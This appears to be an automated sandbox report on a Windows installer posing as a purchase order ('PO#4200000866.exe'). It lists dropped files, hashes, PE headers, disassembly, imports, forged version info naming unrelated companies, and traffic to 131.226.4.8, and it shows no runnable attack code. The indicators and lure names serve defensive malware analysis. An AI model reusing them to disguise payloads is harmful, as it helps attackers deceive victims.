                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1K.1....IAZ\.....A''.....Q].<.]\:v.I.. .P.$..I..3>......o...M..a.Ejn..'.a......t..d.p.e.........r@..Z.&mR..Tc.K..i.j.G.....PW.t...].t.fq1.....U..G....."d.o.[.....{x..>..8...Xu.J.q.....'..uO.^@.....p.........IEND.B`.
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:C source, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):28997
                                                                                    Entropy (8bit):4.9868097347943605
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ieB8/8fGGqYRUIFFS/uNYd5elGVFg83Sg8hNRKlGnnJWXgg+0lk4m4V/:i/Ef5FLFkuNYd5elGVpqR5Rgb
                                                                                    MD5:987A2F0FFB9995CA5AFF8D379FEC14EE
                                                                                    SHA1:74DDC3FCD9358898C68D056BA727EEBE78644EFC
                                                                                    SHA-256:53A1373C331314E3A17B83A89AAF81766C28E0C55B5A814F85FEC7C04EDDBC0E
                                                                                    SHA-512:0B177AA7ABBF9E4345DC0ABD6B982C8971A01ECFB34568B15C9CEF222BC9521199F19F71682D37F61AF8E6608170A119DF68323DAEE7C127B01F3CB977082147
                                                                                    Malicious:false
                                                                                    Preview:/*.** 2016-05-28.**.** The author disclaims copyright to this source code. In place of.** a legal notice, here is a blessing:.**.** May you do good and not evil..** May you find forgiveness for yourself and forgive others..** May you share freely, never taking more than you give..**.******************************************************************************.**.** This file contains the implementation of an SQLite virtual table for.** reading CSV files..**.** Usage:.**.** .load ./csv.** CREATE VIRTUAL TABLE temp.csv USING csv(filename=FILENAME);.** SELECT * FROM csv;.**.** The columns are named "c1", "c2", "c3", ... by default. Or the.** application can define its own CREATE TABLE statement using the.** schema= parameter, like this:.**.** CREATE VIRTUAL TABLE temp.csv2 USING csv(.** filename = "../http.log",.** schema = "CREATE TABLE x(date,ipaddr,url,referrer,userAgent)".** );.**.** Instead of specifying a file, the text of the CSV can be loaded
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):245
                                                                                    Entropy (8bit):6.799965885939206
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:6v/lhPysTDJwk/rbsobd9vbRyWtQ2DF9+EGbgsup:6v/7z3n9DRyWtrukN
                                                                                    MD5:C5152E9074692BE446A7234C15D8168D
                                                                                    SHA1:E1550AEFED9917D3ADABCC113318D6FA35F74260
                                                                                    SHA-256:65F9B122E0735B5E18188420AFE0E1D49B290636AC6FEB4006DBA1C616B7BD67
                                                                                    SHA-512:33FA7E9F48E2B638A292E39489FE67CDE02099BA0B6EDB9B30B20E6C3C9814C2F940EFE896B49437272BD0563BE0AFC0C4EFC6C66C86120487A866BD306F050E
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8......0.......AxQB.(.@7$...x.....p>{.$...I....=...8.>1....U...($.R.K9...c...)aT..a.,[......kl..u.=.%7|..96@..#.!..<dg.f..<...m4..#..w0.f..K...v....../X.~U.%.....=..K.v'dl....IEND.B`.
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):41363
                                                                                    Entropy (8bit):5.191528382819999
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:pihUuz2NdAbqF370l+8tWZAmzBJ7vGF+04IUuJRq4e1Z5S:6Uuzl+v8tWZAuuI04Ab8nk
                                                                                    MD5:38D25CBB82CF16B9D71DDDED2A7B1016
                                                                                    SHA1:838A61D41ECD85FF6F45D305F71C0F92EBA7AD84
                                                                                    SHA-256:53AB9D04A1DD23BE7336BB9DF3E1998A5938E2E5696D3BF4DCB367D20D506F0B
                                                                                    SHA-512:823D753BA289DEC05C616675D380DBD06B6E77A35AE567902C0A451C766843EB11E7F2838A53F22F6871E2D93CB0ADA957FA0E3EF2CA3869E43BE21A507FF13F
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" ?>.... ....WARNING: THIS FILE IS DEPRECATED.....PLEASE USE THE JSON DATA INSTEAD.....Usually, this data can be found in /usr/share/iso-codes/json.....This file gives a list of all countries in the ISO 3166..standard, and is used to provide translations via gettext....Copyright (C) 2002, 2004, 2006 Alastair McKinstry <mckinstry@computer.org>..Copyright (C) 2004 Andreas Jochens <aj@andaco.de>..Copyright (C) 2004, 2007 Christian Perrier <bubulle@debian.org>..Copyright (C) 2005, 2006, 2007 Tobias Quathamer <toddy@debian.org>.... This file is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This file is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABILITY or FITNE
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):528
                                                                                    Entropy (8bit):2.454669672012672
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:WlWUqt/vllXl+YZcFTS9gXeF+X32Zp9XojoW2mnKt3MGHlXml/4XSkVlXllXl/l5:idq2Vg3F+X32RojB5nKKZ4i
                                                                                    MD5:56D41F7E91B9DCD5E8AF747A13C6004B
                                                                                    SHA1:C59F6AE0DE9D72F3046293E9CEE3A8E5077A3F58
                                                                                    SHA-256:9B8494152724313033EE4A2C2112212816F9C11AB5DEF42D3325617ADFF6DE49
                                                                                    SHA-512:CB28A005BFE866102538AF218606269018D7B433DA559E3496C21A63815D439A397A1B9281C4DDEB1D575BC0645D4C0F8D6156171611534F9CA8F6124CB21CA5
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: PO#4200000866.exe, Detection: malicious, Browse
                                                                                    • Filename: s9kIU8A6sJ.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.o.m.o.m.o...i.l.o.2.e.l.o.Richm.o.........PE..L......:..........................................@..................................................................................................................................................................................................rsrc...............................@..@................................................................
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):127
                                                                                    Entropy (8bit):5.509837934582196
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:yionv//thPl9vt3lAnsrtxBllnxnF1wQLLts39BBPa9UspcuRjp:6v/lhPysZf19J69PaxcuRjp
                                                                                    MD5:B16AB36FAD8BB36B66DCF80B4447AAC5
                                                                                    SHA1:020FC710033BB672D59DD3D23DCA5BE9FAD21ED9
                                                                                    SHA-256:F41B83B907535EE547881030EE0F138651E711BB5943D7DC9FDBDE4A1B200D33
                                                                                    SHA-512:4B45C9A71F0437269881A84C3144AE39DFF741F84516F9FA32863E7AED4F668A766AC550E6C2F9E5EA4238181124E5CF7F3B30458C954599B08E8116AB15B7EB
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d....6IDAT8.c`..0...?.~&J]@..,D.Aq2.]@./.u2.]@./..d..`..@1....."l..$....IEND.B`.
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):5.814115788739565
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                    MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                    SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                    SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                    SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: PO#4200000866.exe, Detection: malicious, Browse
                                                                                    • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                    • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                    • Filename: EPAYMENT.exe, Detection: malicious, Browse
                                                                                    • Filename: EPAYMENT.exe, Detection: malicious, Browse
                                                                                    • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                                                                    • Filename: OR17233976_00019489_20170619154218.xlsx, Detection: malicious, Browse
                                                                                    • Filename: xcVh7ZmH4Y.exe, Detection: malicious, Browse
                                                                                    • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                                                                    • Filename: 3GJ6S3Kwnb.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                                                                    • Filename: Bayaran Balik Cukai Terlebih Bayar.exe, Detection: malicious, Browse
                                                                                    • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                                                                    • Filename: 7RsSycKaNc.exe, Detection: malicious, Browse
                                                                                    • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                                                                    • Filename: potwierdzenie wplaty.exe, Detection: malicious, Browse
                                                                                    • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                                                                    • Filename: Docs advice copy.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:modified
                                                                                    Size (bytes):357
                                                                                    Entropy (8bit):7.118113286231142
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:6v/lhPysrTeNeLussfmVacXJ0NzdkvArQFOs95hpKTFJrl0Cau3mOZK+pbp:6v/7LTwMufeacZ0Zd65yZn0C7ZKy
                                                                                    MD5:CACAC26309C82D65E30BCC2CFCA0E51C
                                                                                    SHA1:D18566ECAA9A916FCF0D3BF4D856D3DB8D673391
                                                                                    SHA-256:4A4A91C24410D8CBB16314AAD56F2F751464CFBF88C3FCB27E92C1110AE34706
                                                                                    SHA-512:33E88DC3E45EC413830582544EC31DFDEB270C685DDA51CD6D681B438F1208B6867976D9C382C39ED966ADE22ADC0B8962B6CF6B1C9D78081B26582BE3A5395A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8....N.Q.E..T..*.@.........`AeBei....../.@~..l.. jhl,..*..(X..x..!..e...ww..<..%0..1...b....a..,...Z...q....V~.4..&p"..b.w*....gPuL..5...........|.oK..H)....g..~.........!.d.....}.b:.....h....gP...w.F...XRl...... ...j./...=.+ng....H.n.[D.........=.._u.5.<2.W...ty..;o[3..t.....IEND.B`.
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):30
                                                                                    Entropy (8bit):3.964735178725505
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                    MD5:9F754B47B351EF0FC32527B541420595
                                                                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                    Malicious:false
                                                                                    Preview:NordVPN directory not found!..
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):6.3914685624967245
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:PO#4200000866.exe
                                                                                    File size:379352
                                                                                    MD5:5d0444b70ff5caa4ec3b2ca2e563e724
                                                                                    SHA1:27309fdae9005f71dcde3501f023819ae6dba6cb
                                                                                    SHA256:fd620fd2a9d5ca1dea1e11013eb4ec486f2f5cb340cd28bcbe39e78271fc5d26
                                                                                    SHA512:436da2ee2bad47ef2027fb4a3dfda2e1070cb7c9a888bb594c4f25a15adb103f6c686e35b7d10bccad6f824a503fedebe6c6c5ba404ac8f50398837791d66e05
                                                                                    SSDEEP:6144:ZYa6W/pzBlsLyHIlr3SkSHyO5AxPO5khaL6YSsA2gaRD:ZYwxY3pC3Qmeaqspt
                                                                                    TLSH:2A84F141BBA8D4A7C5720B300CEA96A55ABDAD502996070B338077ED3FB37D19F1E319
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                                                    Icon Hash:30b0e969e8dccc00
                                                                                    Entrypoint:0x403640
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:61259b55b8912888e90f516ca08dc514
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN="Cunzie3 Brevsamlerens9 ", O=hovedstningers, L="Chemnitz, Sachsen", S=Sachsen, C=DE
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 11/05/2022 07:49:05 11/05/2023 07:49:05
                                                                                    Subject Chain
                                                                                    • CN="Cunzie3 Brevsamlerens9 ", O=hovedstningers, L="Chemnitz, Sachsen", S=Sachsen, C=DE
                                                                                    Version:3
                                                                                    Thumbprint MD5:7EB0C866C3B021249A083B3B2649C8F2
                                                                                    Thumbprint SHA-1:16CC515505D981DB017A84FD49AAD119D768FE27
                                                                                    Thumbprint SHA-256:674CD0F94F9959B355B9421AE98E15ED7994315E7C5BE0D60BF14B056E24CF52
                                                                                    Serial:947ABF3A4FA2102E
                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 000003F4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [ebp-14h], ebx
                                                                                    mov dword ptr [ebp-04h], 0040A230h
                                                                                    mov dword ptr [ebp-10h], ebx
                                                                                    call dword ptr [004080C8h]
                                                                                    mov esi, dword ptr [004080CCh]
                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                    push eax
                                                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                                                    mov dword ptr [ebp-2Ch], ebx
                                                                                    mov dword ptr [ebp-28h], ebx
                                                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                    call esi
                                                                                    test eax, eax
                                                                                    jne 00007F4A548BDBEAh
                                                                                    lea eax, dword ptr [ebp-00000140h]
                                                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                                                    push eax
                                                                                    call esi
                                                                                    mov ax, word ptr [ebp-0000012Ch]
                                                                                    mov ecx, dword ptr [ebp-00000112h]
                                                                                    sub ax, 00000053h
                                                                                    add ecx, FFFFFFD0h
                                                                                    neg ax
                                                                                    sbb eax, eax
                                                                                    mov byte ptr [ebp-26h], 00000004h
                                                                                    not eax
                                                                                    and eax, ecx
                                                                                    mov word ptr [ebp-2Ch], ax
                                                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                    jnc 00007F4A548BDBBAh
                                                                                    and word ptr [ebp-00000132h], 0000h
                                                                                    mov eax, dword ptr [ebp-00000134h]
                                                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                                                    mov dword ptr [0042A318h], eax
                                                                                    xor eax, eax
                                                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                                                    movzx eax, ax
                                                                                    or eax, ecx
                                                                                    xor ecx, ecx
                                                                                    mov ch, byte ptr [ebp-2Ch]
                                                                                    movzx ecx, cx
                                                                                    shl eax, 10h
                                                                                    or eax, ecx
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x284c0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x5ab380x1ea0.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                    .ndata0x2b0000x220000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x4d0000x284c00x28600False0.253543440402data3.51609274329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_ICON0x4d3580x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                    RT_ICON0x5db800x94a8dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                    RT_ICON0x670280x5488dataEnglishUnited States
                                                                                    RT_ICON0x6c4b00x4228dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                    RT_ICON0x706d80x25a8dataEnglishUnited States
                                                                                    RT_ICON0x72c800x10a8dataEnglishUnited States
                                                                                    RT_ICON0x73d280x988dataEnglishUnited States
                                                                                    RT_ICON0x746b00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                    RT_DIALOG0x74b180x120dataEnglishUnited States
                                                                                    RT_DIALOG0x74c380xf8dataEnglishUnited States
                                                                                    RT_DIALOG0x74d300xa0dataEnglishUnited States
                                                                                    RT_DIALOG0x74dd00x60dataEnglishUnited States
                                                                                    RT_GROUP_ICON0x74e300x76dataEnglishUnited States
                                                                                    RT_VERSION0x74ea80x2d8dataEnglishUnited States
                                                                                    RT_MANIFEST0x751800x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                                    DLLImport
                                                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                    DescriptionData
                                                                                    LegalCopyrightMetaldyne Corporation
                                                                                    FileVersion26.10.23
                                                                                    CompanyNamePeoples Energy Corp.
                                                                                    LegalTrademarksFifth Third Bancorp
                                                                                    CommentsWm Wrigley Jr Company
                                                                                    ProductNameHome Depot Inc.
                                                                                    FileDescriptionMicron Technology Inc.
                                                                                    Translation0x0409 0x04b0
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    May 11, 2022 14:51:31.360398054 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.469597101 CEST8049760131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:31.469865084 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.470997095 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.579552889 CEST8049760131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:31.580470085 CEST8049760131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:31.580776930 CEST4976080192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.670331955 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.670398951 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:31.670577049 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.689426899 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:31.689464092 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.045809031 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.046034098 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.046066046 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.181389093 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.181441069 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.182199001 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.182385921 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.186207056 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.226654053 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.298358917 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.298444033 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.298506021 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.298564911 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.298696995 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.298778057 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.407738924 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.407933950 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.407994032 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.408333063 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.408602953 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.408627033 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.408662081 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.408797026 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.408958912 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.518625021 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.518980980 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.519128084 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.519345999 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.519462109 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.519737005 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.519984007 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.519995928 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.520023108 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.520153999 CEST49761443192.168.11.20131.226.4.8
                                                                                    May 11, 2022 14:51:32.520220995 CEST44349761131.226.4.8192.168.11.20
                                                                                    May 11, 2022 14:51:32.520334005 CEST49761443192.168.11.20131.226.4.8
